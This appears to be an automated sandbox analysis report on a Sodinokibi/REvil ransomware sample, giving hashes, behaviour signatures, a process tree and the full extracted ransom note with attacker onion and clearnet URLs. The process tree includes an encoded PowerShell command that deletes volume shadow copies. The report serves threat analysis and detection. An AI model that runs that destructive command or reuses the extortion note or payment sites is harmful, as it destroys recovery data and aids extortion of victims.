Analysis

  • max time kernel
    151s
  • max time network
    162s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    30-01-2022 07:56

General

  • Target

    22d91795b7fc302eac6b2ee9a582ab7de1e29028d313a1fd34ff64f8f5baa0a3.exe

  • Size

    133KB

  • MD5

    fa3cbd224ae012ebbef336f49cf83c77

  • SHA1

    7071091b8f7e0387a0d0e643665acb12d5eab211

  • SHA256

    22d91795b7fc302eac6b2ee9a582ab7de1e29028d313a1fd34ff64f8f5baa0a3

  • SHA512

    fee1a5408ea269d6b338d338cbaae90f32a90de6061a2e8ed2bf216e9496a7e475ffea8c08c7ceb5022e36595eb403eb8695a87b2b08d316a24662d72940fd53

Malware Config

Extracted

Path

C:\49sbjcp-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 49sbjcp. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A9B4D38C6EA2A2B8 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/A9B4D38C6EA2A2B8 Warning: secondary website can be blocked, thats why first variant much better and more available. 
When you open our website, put the following data in the input form: Key: ixl5OYEZTfarkuUGpM/5/Ky6dHsvNURGf4VtG/5Y/mCx4K2TQkos+2XXbYbdWCWD 6yxGgbmy1Bs2aO1EBHWaRIRvDH7MzIIQkq5ZO5unYD856AUMjdSO74DEF9XN4c6w UhWD3p79ctBV4iolLqgqecVsEWZBUhGmveMT1MklfaFSheMtq34mpUokmJFawsln qbiO4fdg/D1jDdCH/KuOCdRtTaMIh3UpSphz9chdTmF9Tct98qnheRPTFvgVFgom qZyGpgEq5mQ9pVo4QFpCgpYRkWHJGcRxC8POCT+kfBiEcfP+Ssjgfv9uLqaw9Rys oQUqsYsqcjgNZC8OMqPJ4sUzcQe1SrVDUIwle+wmjRMEd9fLKZTZw2rkQ6nnpUnA NnJ4kyhf/52mBsV5eDdYjn/hzxXGPhtyZILbSJFVGFmUGpwr0nL1743TGkdCdkEj MkUsqP+TZUcQRcHBXweh6uDp7QQUVoIHzqcTAUUnP7Alv5VCReYVUIM2UeZnilZF gkz8g7iNGBXQXlaW9KRFVxDzih/dguNZqdFbYkQKNunMIxFgekqOznOLx/XvamRn olHIn0pPNVZeymKntnWvZFDuro+0JonC5CjUU+pI0O/AIOfAsU07yBECvy5KeGK8 hlSNrHHeW9qw3PlX3Xds3c/7Xrni3Yn3bfBoASwbbIpTjoxIT5MAiAwOo1G7ncdc 7lQWvXn3l67tpmeJ/EXE9W+lvbIWYbDfImWQsJW1eWIuPUeE0oDn/WesFU6IYNuV rR9iKvtaAIjuBIbL2d4eJBZ3Tq3BHJGcj9Yct0wjjc5aUHQ4NKT/MRn5zXSsJaw+ sOwcpHCM8QK/fRIlo+FQQK8WdtOAhRwJzPj+GImCudX0Mr3HdW6DecplZMLJjJSm d0O5d3uSN69WBTNoLgxQr8daBLU+E5livGBLxfprWB6N4xv0Sf0T4NgMVwfzq25A x+o7s6EmPUfYYb5L+hN4MRbSGSBsrwL37pPP+evX/UA7Po4SQliv+kpdQ6zCNhWl 9mK/LYEsmjoTpib0Tn0UiLRTHA8qwCpttfm918t5WLmU80ZhuAXy9qmu537Zo2En urqnp+mB5AqoQz0s2s0s8oJMsACdBx3pHDxp42CJd2aAeUxZ2c12bjODltnlS4Ky GNuNHRYLm3DVVEER5JkhfpdemtdCSSyOO0KlkhXtZpuH2k3Kywzwcg+Aw3pAUfhE 7KEGU/6PZqUBAA8oif+QYs0LwZIVUcoOWsbIw+VVHz2rJoCRdNhTR7C/UF4mOZya rQfDXaMCA8+hvUwgbAnQhWAFazQLeH9JlyQ= ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A9B4D38C6EA2A2B8

http://decryptor.cc/A9B4D38C6EA2A2B8

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies extensions of user files 6 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 18 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\22d91795b7fc302eac6b2ee9a582ab7de1e29028d313a1fd34ff64f8f5baa0a3.exe
    "C:\Users\Admin\AppData\Local\Temp\22d91795b7fc302eac6b2ee9a582ab7de1e29028d313a1fd34ff64f8f5baa0a3.exe"
    1⤵
    • Modifies extensions of user files
    • Adds Run key to start application
    • Enumerates connected drives
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1612
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:684
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1132
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1488

Network

MITRE ATT&CK Enterprise v6

Downloads

  • memory/684-56-0x000007FEFC4A1000-0x000007FEFC4A3000-memory.dmp

    Filesize

    8KB

  • memory/684-58-0x00000000025A0000-0x00000000025A2000-memory.dmp

    Filesize

    8KB

  • memory/684-59-0x00000000025A2000-0x00000000025A4000-memory.dmp

    Filesize

    8KB

  • memory/684-60-0x00000000025A4000-0x00000000025A7000-memory.dmp

    Filesize

    12KB

  • memory/684-57-0x000007FEF3510000-0x000007FEF406D000-memory.dmp

    Filesize

    11.4MB

  • memory/684-61-0x00000000025AB000-0x00000000025CA000-memory.dmp

    Filesize

    124KB

  • memory/1612-55-0x0000000076921000-0x0000000076923000-memory.dmp

    Filesize

    8KB